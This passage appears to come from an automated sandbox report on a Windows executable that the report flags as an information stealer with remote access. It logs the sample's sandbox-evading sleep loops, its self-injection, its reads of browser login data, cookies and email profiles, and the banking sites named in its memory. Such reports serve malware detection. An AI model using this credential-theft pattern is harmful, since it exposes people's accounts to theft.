                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594890Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594562Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeWindow / User API: threadDelayed 1547Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeWindow / User API: threadDelayed 8287Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 7548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6172Thread sleep count: 1547 > 30Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6172Thread sleep count: 8287 > 30Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599747s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599631s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599372s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -599047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -598062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597295s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -597078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -596093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -595000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -594890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -594781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exe TID: 6164Thread sleep time: -594562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599747Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599631Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599515Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599372Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599265Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 599047Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598937Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598609Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598499Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598390Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 598062Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597953Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597843Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597295Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595874Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595218Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594890Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeThread delayed: delay time: 594562Jump to behavior
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3795110328.00000000011D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: n8l3NmC5EH.exe, 00000003.00000002.3798314956.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeCode function: 3_2_06A49668 LdrInitializeThunk,3_2_06A49668
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeMemory written: C:\Users\user\Desktop\n8l3NmC5EH.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeProcess created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Users\user\Desktop\n8l3NmC5EH.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Users\user\Desktop\n8l3NmC5EH.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\n8l3NmC5EH.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.3795724526.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.n8l3NmC5EH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4c361d8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3794147550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1338031140.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
